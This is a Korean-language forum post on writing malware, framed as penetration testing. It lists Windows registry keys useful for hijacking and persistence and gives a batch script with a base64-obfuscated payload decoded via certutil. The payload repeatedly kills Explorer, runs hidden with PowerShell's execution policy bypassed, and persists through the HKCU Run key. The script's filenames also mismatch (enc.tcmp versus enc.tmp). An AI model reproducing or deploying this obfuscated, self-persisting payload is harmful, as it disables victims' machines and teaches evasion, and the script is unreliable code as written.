Jump to content
Sign in to follow this  
traitor

악성코드 제작에 대해서..

Recommended Posts

악성코드를 제작하고 싶은 사람들은 보통 두가지 목적을 가지고 있다고 생각한다

 

모의해킹과, 크래킹

 

난 모의해킹에 대해 다루고싶다. 
크래킹이라고 다를건 없다. 다만 다루는 사람이 다를뿐..

 

일단 개발하기전에, 공격을 진행할 피해자의 취약점과, 정보는 알고 있지 않고있다고 가정 할 것이다.

2018년 기준 플랫폼은 Windows 7~10으로 가정하겠다.
 

 

1. 실행권한
 

Administrators : 로컬 컴퓨터에 대한 모든 권한을 가진다

User : 로컬 컴퓨터를 사용하게 되는 일반적 권한, User에게 할당되어있는 환경 내에서 작업이 가능하며, 권한이 필요할시 UAC를 통해서 Administrators의 권한을 받아서 사용이 가능하다.

 

Administrators권한이 가지는 가장 큰 이점은, 레지스트리키값의 변조에 있다.

 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options (디버거 설정)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell (Windows Shell Path) 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Windows Shell Path)

와 같은 보안과 매우 밀접한 키에 접근이 가능하다.

 

2. 공격준비

 

상대적으로 보안교육을 받지않은 피해자라면, UAC를 바로 수락 할 것이다.
하지만 보안교육을 받은 피해자라면 의심할것이다.
UAC를 우회(UAC BYPASS)하는 방법은 취약점을 공략하면 될것이다. 

하지만 해당 포스트에선 분량이 너무 길어지니, 다루지않겠다.
 

피해자의 취약점과, 정보를 알고있지않은 상태이니, 우리는 User권한으로 공략해야한다

 

User권한으로도 할 수 있는 짓은 생각보다 많다.

 

우선 시작프로그램 등록부터 진행하자. 지속적인 쉘을 얻어내야 하니까..
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

해당 경로에 스크립트나, 실행파일을 copy또는 write해주면 된다.
또는..


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

해당 레지스트리 키에 등록 시켜주면 된다.

3. 공격

 

먼저 만들 악성코드의 컨셉을 잡아야한다.

 

랜섬웨어를 만들것인가?
크립토 재킹을 시도할것인가?

원격 쉘?

 

등등.. 이 있지만 해당 예제에선 다루지않겠다.
다만 단순 공격을 시도할것이다.
 

echo Y | del "%TMP%\enc.tmp"

 

echo QGVjaG8gb2ZmCgpta2RpciAlQVBQREFUQSVcJVVTRVJOQU1FJQoKZWNobyB3aGlsZSgxKSA+ICIlQVBQREFUQSVcJVVTRVJOQU1FJVxBZ2VudC5wczEiCmVjaG8geyA+PiAiJUFQUERBVEElXCVVU0VSTkFNRSVcQWdlbnQucHMxIgplY2hvICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImV4cGxvcmVyIiA+PiAiJUFQUERBVEElXCVVU0VSTkFNRSVcQWdlbnQucHMxIgplY2hvICAgICBTdGFydC1TbGVlcCAtU2Vjb25kcyAxID4+ICIlQVBQREFUQSVcJVVTRVJOQU1FJVxBZ2VudC5wczEiCmVjaG8gfSA+PiAiJUFQUERBVEElXCVVU0VSTkFNRSVcQWdlbnQucHMxIgoKZWNobyBQb3dlcnNoZWxsLmV4ZSAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1maWxlICIlQVBQREFUQSVcJVVTRVJOQU1FJVxBZ2VudC5wczEiID4gIiVBUFBEQVRBJVwlVVNFUk5BTUUlXHBheWxvYWQuYmF0IgoKZWNobyBTZXQgb2JqU2hlbGwgPSBDcmVhdGVPYmplY3QoIlNoZWxsLkFwcGxpY2F0aW9uIikgPiAiJUFQUERBVEElXCVVU0VSTkFNRSVccnVuLnZicyIKZWNobyBvYmpTaGVsbC5TaGVsbEV4ZWN1dGUgIiVBUFBEQVRBJVwlVVNFUk5BTUUlXHBheWxvYWQuYmF0IiwgIiIsICIiLCAib3BlbiIsIDAgPj4gICIlQVBQREFUQSVcJVVTRVJOQU1FJVxydW4udmJzIgoKZWNobyBZIHwgcmVnIGFkZCAiSEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIiAvdiAiQXV0b1J1biIgL3QgUkVHX1NaIC9kICIlQVBQREFUQSVcJVVTRVJOQU1FJVxydW4udmJzIgoKIiVBUFBEQVRBJVwlVVNFUk5BTUUlXHJ1bi52YnMiCg== > "%TMP%\enc.tcmp"

 

certutil -decode "%TMP%\enc.tmp" "%TMP%\dec.bat"

"%TMP%\dec.bat"

해당 코드를 배치파일로 만들고 Virtual Machine에서 실행해보자. Windows Shell인 Explorer가 날라간다.

  • Like 1

Share this post


Link to post
Share on other sites
Guest
You are commenting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×

Important Information

I have read and accept the above terms.